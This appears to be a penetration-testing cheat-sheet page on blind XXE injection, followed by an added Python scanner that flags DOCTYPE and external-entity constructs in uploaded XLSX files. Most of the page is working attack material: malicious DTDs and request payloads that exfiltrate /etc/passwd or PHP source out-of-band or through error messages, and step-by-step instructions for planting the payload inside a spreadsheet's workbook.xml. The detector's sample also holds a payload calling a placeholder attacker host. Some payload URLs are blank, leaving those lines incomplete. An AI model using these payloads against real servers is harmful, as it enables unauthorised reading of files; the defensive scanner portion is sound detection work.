Blind XXE

Last modified: 2023-06-10


Blind XXE is a variant of XML External Entity (XXE) injection in which an attacker can inject malicious XML (external entity declarations) into input that the server parses, but receives no direct feedback or response from the server. Because nothing is reflected, the data has to be retrieved out-of-band or through error messages.

Data Exfiltration via Out-Of-Band

1. Create a Malicious DTD

We need to prepare a DTD file (named "exploit.dtd" here) that retrieves the target file.
Replace the IP address with your own.

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!-- <!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=index.php"> -->
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM ';'>">

Then host it on a web server.

sudo python3 -m http.server 80

2. Insert XXE

In the HTTP request body, insert the following XXE payload.
As with the DTD above, replace the IP address with your own.

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM ""> %xxe;]>

Now send the request. If the parser fetches the external DTD, the content of the target system's local file should show up in the request logged by our web server.

Data Exfiltration via Out-Of-Band (Error-based)

If the website shows parser error messages when the XXE payload is processed, we can use the following malicious DTD instead: it places the file content inside an invalid URI so that it is echoed back in the error message.

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">

For the rest, please refer to the section above.

Inside XLSX File

An XLSX file is a Microsoft Excel spreadsheet.

1. Create an XLSX File

First we need to create an XLSX file using software such as LibreOffice Calc.

2. Extract the XLSX File

7z x -oXXE xxe.xlsx
cd XXE

We should get files such as “.xml”.

3. Add the Blind XXE Payload to the XML File

Insert the following payload into xl/workbook.xml.
Replace the “” with your local IP address.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE cdl [<!ELEMENT cdl ANY ><!ENTITY % asd SYSTEM "">%asd;%c;]>
<workbook xmlns="" xmlns:r="">

4. Rebuild the XLSX File

cd XXE
7z u ../xxe.xlsx *

5. Create XXE inside a DTD File

Create “xxe.dtd”.
Replace “” with your local IP address.

<!ENTITY % d SYSTEM "file:///etc/passwd">
<!ENTITY % c "<!ENTITY rrr SYSTEM ';'>">

6. Start a local server

Serve the DTD file using xxeserv.

git clone
cd xxeserv
go mod init xxeftp.go
go build
go run xxeftp.go -o files.log -p 2121 -w -wd public -wp 8000

In another terminal, start a web server in the directory where “xxe.dtd” is located.

sudo python3 -m http.server 80

Now upload the “xxe.xlsx” file to the website. We should get the content of the desired file.
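From the defending side, every payload on this page (the request-body DOCTYPE, the error-based DTD, and the workbook.xml inside the XLSX) relies on a DOCTYPE with a parameter entity and an external SYSTEM identifier, none of which legitimate spreadsheet or API XML needs. The following is an added example, not code from the original page: a pre-parse gate that flags those constructs in raw XML and in every XML part of an uploaded .xlsx package. The sample package and the attacker host name are constructed placeholders.

```python
import io
import re
import zipfile

# Spreadsheet XML parts never need a DTD, so any DOCTYPE is a red flag.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
# Entity declarations with an external identifier; a leading % marks a parameter entity.
EXTERNAL_ENTITY_RE = re.compile(rb"<!ENTITY\s+(%\s*)?\S+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)
# References such as %xxe; that expand a parameter entity inside the internal subset.
PARAM_REF_RE = re.compile(rb"%[A-Za-z_][\w.-]*;")


def xml_findings(data: bytes) -> list[str]:
    """Return the DTD constructs found in one XML document, in a fixed order."""
    findings = []
    if DOCTYPE_RE.search(data):
        findings.append("doctype")
    for m in EXTERNAL_ENTITY_RE.finditer(data):
        findings.append("parameter-entity" if m.group(1) else "external-entity")
    if PARAM_REF_RE.search(data):
        findings.append("parameter-entity-ref")
    return findings


def scan_xlsx(blob: bytes) -> dict[str, list[str]]:
    """Map each XML part of an .xlsx (a zip) to its findings; an empty dict means clean."""
    hits = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for name in zf.namelist():
            if name.lower().endswith((".xml", ".rels")):
                found = xml_findings(zf.read(name))
                if found:
                    hits[name] = found
    return hits


def build_sample_xlsx(workbook_xml: bytes) -> bytes:
    """Constructed minimal package for the demo; not a real spreadsheet."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", b'<?xml version="1.0"?><Types/>')
        zf.writestr("xl/workbook.xml", workbook_xml)
    return buf.getvalue()


BENIGN = b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n<workbook/>'
# Constructed sample shaped like the page's workbook.xml payload; the host is a placeholder.
MALICIOUS = (b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
             b'<!DOCTYPE cdl [<!ELEMENT cdl ANY ><!ENTITY % asd SYSTEM '
             b'"http://ATTACKER-HOST-PLACEHOLDER/xxe.dtd">%asd;%c;]>\n<workbook/>')
```

Run `scan_xlsx(build_sample_xlsx(MALICIOUS))` to see `xl/workbook.xml` flagged while the benign package returns an empty dict; rejecting the upload on any finding stops the DTD from ever reaching the XML parser.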